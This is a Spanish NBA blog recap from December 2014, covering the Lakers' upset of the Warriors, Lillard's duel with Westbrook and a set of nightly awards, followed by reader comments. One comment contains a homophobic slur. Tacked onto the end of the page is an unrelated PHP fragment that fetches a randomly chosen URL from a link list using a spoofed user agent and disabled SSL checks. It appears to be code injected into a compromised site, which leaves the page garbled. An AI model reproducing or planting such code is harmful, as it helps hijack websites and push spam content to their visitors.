La crónica: Milagro nbavideño

24 de December de 2014 por TheDeerHunter

A pesar de jugar sin Kobe Bryant los Lakers fueron el cuarto equipo capaz de doblegar a los Warriors este año. Vivimos también un duelo antológico Westbrook vs. Lillar y comprobamos que los Hawks siguen intratables con su victoria ante los Clippers…

lillard_thunder

Warriors 105 – Lakers 115

Batacazo monumental de los líderes en el Staples. Se las prometían muy felices ante el descanso de Kobe y ni siquiera Byron Scott esperaba una excelencia colectiva de los suyos como la mostrada. Con un quinteto serie B (Price-Ellington-Johnson-Davis-Hill) los Lakers ofrecieron su mejor versión del curso. 7 hombres en dobles figuras y todo el equipo produciendo. Lo más increíble es que la victoria se produjo dando de su propia medicina a los hombres de Steve Kerr. Ambos equipos anotaron 12 de 26 en triples pero esta vez no fue suficiente para los Warriors.

Clippers 104 – Hawks 107

Lo de los Hawks comienza a ser un escándalo. Ayer con DeMarre Carroll de primera espada y Jeff Teague de reserva. El lanzamiento lejano volvió a causar estragos. Los Clippers vuelven a hacer la goma mirando por el retrovisor a los campeones y a los Thunder. Yo si fuera Doc les ponía a lanzar tiros libres todo el día de Navidad.

Blazers 115 – Thunder 111

Los Thunder iban ganando de 6 a falta de 44 segundos. No hay problema si tienes un Lillard en tu vida arreglando ese tipo de menesteres con triplaco tras triplaco. Ciertamente es uno de los hombres clutch del momento. Una vez en la prórroga los Blazers fueron mejores. Ibaka mostró su frustración peleando con LaMarcus y ambos fueron expulsados antes de terminar la velada.

El resto de la jornada

Triple doble de Eric Bledsoe ante Rondo y los Suns doblegaron a los Mavericks; los Sixers sumaron la cuarta victoria remontando 23 puntos a los depresivos Heat; los Hornets lograron su cuarta victoria seguida (todas sin Lance Stephenson) ante los Bucks y ya rozan zona de playoffs; Los Nets doblegaron a los Nuggets; Derrick Rose y Pau Gasol fueron suficiente para tumbar a los Wizards; Celtics y Pelicans tropezaron en Orlando e Indiana respectivamente, y finalmente los Cavs ganaron a los Wolves en el reencuentro de Kevin Love con sus excompañeros.

PREMIOS

MVP: La mejor actuación de la noche y una de las mejores de la temporada fue la firmada por Damian Lillard. El base de los Blazers volvió a erigirse como uno de los mejores clutchman que hayamos visto y lideró la victoria de los suyos ante los Thunder en un espectacular mano a mano contra Westbrook. Lillard anotó el triple que forzó la prórroga y se fue a los 40 puntos con 11 asistencias, 6 rebotes y 2 robos.

Rookie: Era el día más adecuado para que Andrew Wiggins se reivindicase, ante el equipo que lo drafteó y lo traspasó posteriormente a los Wolves, y vaya si lo hizo el número 1 de esta última hornada. Wiggins sumó 27 puntos, con 9 de 16 en tiros, incluyendo 3 de 3 en triples, con 2 rebotes, 2 asistencias, 1 robo y 1 tapón.

Sorpresa: El sorpresón de la jornada fue, sin lugar a dudas la victoria de los Lakers frente al mejor equipo de la competición hasta el momento. Quien mejor representó la noche dulce de los angelinos fue Ronnie Price, sensacional ante Steph Curry con 17 puntos, 8 asistencias, 4 rebotes y 3 robos de balón.

Decepción: Si alguien estuvo especialmente por debajo de su nivel habitual por parte de los Warriors fue Draymond Green, que se quedó en 2 puntos con un 1 de 6 en tiros. Parecida fue la actuación de Jeff Green, limitado a 4 puntos, sin rebotes ni asistencias en su haber, en la derrota de los Celtics

Mayor esfuerzo en vano: Ya sabemos que siempre que Durant sea baja, Russell Westbrook está más que dispuesto a echarse el equipo a la espalda. Lo intentó anoche frente a los Blazers y se quedó a un paso de salirse con la suya, pero al final sucumbió ante Lillard y ante sus propios errores. Aun así se lleva nuestro reconocimiento gracias a sus 40 puntos, 10 rebotes, 6 asistencias y 3 robos de balón. Hay que mencionar también a Blake Griffin (21-8-11) & DeAndre Jordan (15-22-4) y a Tyson Chandler (22-14), excelentes pese a las derrotas de sus equipos.

Top 10

Y de regalo, las 12 mejores jugadas en la historia de los partidos jugados en Navidad:

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. jhc dice:
    #1

    Sorpreson de los lakers ¿Es gafe Bryant? yo creo que sí pero no porque sea gafe sino porque no deja jugar a los demá, se piensa que tiene mancos al lao y se las tira todas el porque si no no ganan y lo unico que hace es que ni juegue bien el ni los demás

    mis Hawks siguen viento en popa! a princiio de curso nos veía mejor que el año pasadoporla vuelta de Horford pero no me esperaba tanta mejoría, Buldenhozer es MUY pero que MUY bueno

      Citar

  2. Ruxixón dice:
    #2

    Parece empeñado Lillard en demostrar su inmensa clase en el menor tiempo posible por eso de haberse presentado al draft con 22 años.Para mí no deja de ser un jugón infravaloradísimo cuando se hacen rankings de PG de la NBA,difícil que alguien le ponga entre los 5 mejores amparándose en el “que ya ha alcanzado su techo”.Pues vaya techo tiene.

    Siguiendo con los bases,una pena los problemas de faltas de Wall,pero bonito duelo vs Rose,de hecho en el último cuarto hubo una racha de Wall para un parcial 12-0 para los Wizards que dio la vuelta al marcador,y posterior respuesta de Rose con más de lo mismo.Un Rose que vuelve por sus fueros y él lo nota.

    En fin,no soy el rey pero os felicito por las navidades tjnba-eros ¡A disfrutarlas con mucho baloncesto!

      Citar

  3. Azabel dice:
    #3

    Josh Smith a los Rockets, a quienes con el espacio q hicieron y desperdiciaron terminan por hacerse con Smith y Brewer y salen hasta ganando diria yo

    no mas excusas para Howard a partir de ahora, o ganan la liga y pasa a ser el Shaq de los cavs y celtics

      Citar

  4. Denise dice:
    #4

    Varejao Out of Season…., los Cavs van a necesitar urgentemente adquirir a un pivot porque la pintura les va a hacer aguas. Imagino que Waiters debe ser la moneda de cambio y estará ya en la picota.

      Citar

  5. Azabel dice:
    #5

    Denise:
    Varejao Out of Season…., los Cavs van a necesitar urgentemente adquirir a un pivot porque la pintura les va a hacer aguas. Imagino que Waiters debe ser la moneda de cambio y estará ya en la picota.

    creo q interaran primero dar la ronda que tienen de Menphis por alguien de poca monta y en caso de necesidad por que las cosas no funcionan intentaran mover a Waiters

      Citar

  6. Ruxixón dice:
    #6

    A mí me molaría que fueran a por jugadores marginales que han tenido poca bola en sus equipos como Biyombo o Meyers Leonard,pero a saber qué hacen.Lo de darle 30 millones a Varejao sabiendo lo frágil que es,en fin,todas las temporadas tiene una lesión grave y si cuentas con él,por lo menos asegúrate de tener un buen plan.Pero esto son los Cavaliers.

      Citar

  7. Ruxixón dice:
    #7

    Quincy Acy repartiendo el espíritu de la Navidad por el Madison ^^

      Citar

  8. Denise dice:
    #8

    Ruxixón:
    Quincy Acy repartiendo el espíritu de la Navidad por el Madison ^^

    Jajaj,, que tio mas tonto, inicia él la bronca metiendole los codos en la barbilla a Wall, y encima va después a punchearle.
    A todo esto, otra derrota para los Knicks. De verdad, ¿a que esperan para largar a Fisher??

    Me temo que la penetración con giro de Wall para acabar metiendo una bandeja humillando a Jason Smith va a ser una de las jugadas del año. Bestial!! Para mi ahora mismo, el mejor PG del mundo por delante de CP3.

      Citar

  9. Denise dice:
    #9

    Denise: Jajaj,, que tio mas tonto, inicia él la bronca metiendole los codos en la barbilla a Wall, y encima va después a punchearle.

    Ah.. y en esa jugada, segundos antes, vaya flopping descarado de Prigioni tirandose al suelo como una maricona.
    Retirate ya, momia!!

      Citar

  10. rumbero dice:
    #10

    Yo llego ahora que prefería aguantar la charla postnavideña del cuñao sobre Podemos que ver a los Knicks. Justo para ver a Perkins repartiendo regalitos

      Citar

  11. Nacho dice:
    #11

    Qué mal me cae Westbrook! Pero que partidazo se acaba de cascar en SA!! No se puede decir que lo ha ganado él solito, porque Ibaka ha estado muy bien, un sorprendente Adams y un Morrow en su tónica, sumando. A Reggie Jackson le ha salvado una canasta en momento caliente.

      Citar

  12. Nacho dice:
    #12

    A los Spurs les falta un punch. Siguen jugando muy bien, pero se bloquean en algunos momentos.Ha vuelto Parker, pero no debe andar muy fino físicamente. Y Diaw ha faltado hoy, y los regalitos que ha dado Manu no han servido para ganar.

      Citar

  13. Ruxixón dice:
    #13

    Vaya desastre la defensa de los Cavaliers en la primera mitad contra Miami,con 62 puntos al descanso y ofreciendo la variante del small-ball,con Love de center,como solución a la lesión de Varejao.Nivelazo el de Wade,24 puntos en 18 minutos,y ganándole la partida a LeBron que está maquillando a través de los tiros libres.A ver lo que da de sí la cosa en la segunda parte.

      Citar

  14. rumbero dice:
    #14

    Nacho:
    Qué mal me cae Westbrook! Pero que partidazo se acaba de cascar en SA!! No se puede decir que lo ha ganado él solito, porque Ibaka ha estado muy bien, un sorprendente Adams y un Morrow en su tónica, sumando. A Reggie Jackson le ha salvado una canasta en momento caliente.

    A Westbrook hay que quererle y odiarle a partes iguales. Un tio que lo da todo para bien o para mal. Siempre le solemos sacar los defectos y no las virtudes, pero la verdad es que lleva una temporada brutal, como para entrar en las quinielas del MVP. Como dices hoy no lo gana él solo pero casi. Westbrook aparte, me ha parecido tremendo el partido de Adams matando a los Spurs en rebote y defensa. Y estos últimos muy inconsistentes durante todo el partido. Igual demasiados minutos y lesionados en la última semana… y el oeste que va a estar más caro que nunca

      Citar

  15. Nacho dice:
    #15

    Ruxixón:
    Vaya desastre la defensa de los Cavaliers en la primera mitad contra Miami,con 62 puntos al descanso y ofreciendo la variante del small-ball,con Love de center,como solución a la lesión de Varejao.Nivelazo el de Wade,24 puntos en 18 minutos,y ganándole la partida a LeBron que está maquillando a través de los tiros libres.A ver lo que da de sí la cosa en la segunda parte.

    Pues se lo lleva Miami, más por desafección de los Caavaliers, que por deseo suyo, porque vaya truño de segunda parte. Muy bien Deng y Granger. Horrible Wade tras su excelsa primera parte. Lo de los Cav’s es para mirárselo.
    Tiene equipo majo Heat, pero un problema y gordo en el puesto de base. Debe ser el peor en la liga en esa posición. No entiendo cómo no juega el rookie del que hablan tan bien, porque Cole y Chalmers no dejan de ser aceptables bases suplentes.

      Citar

  16. Ruxixón dice:
    #16

    Pues si,segunda parte gatillazo para lo que prometía la primera.Además que cuando conseguio igualar Cleveland llegó la racha de Miami que dejó el partido de nuevo roto.No sé cómo lo sentirán los aficionados de los Cavs pero un poco excesivo las risitas de LeBron con todo el mundo en el pabellón la verdad.

      Citar

  17. Jose Luis dice:
    #17

    Pues para mi la culpa es de Wall. Te han hecho falta, pues ya está, juego parado. A partir de ahí el que inicia la pelea es él.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>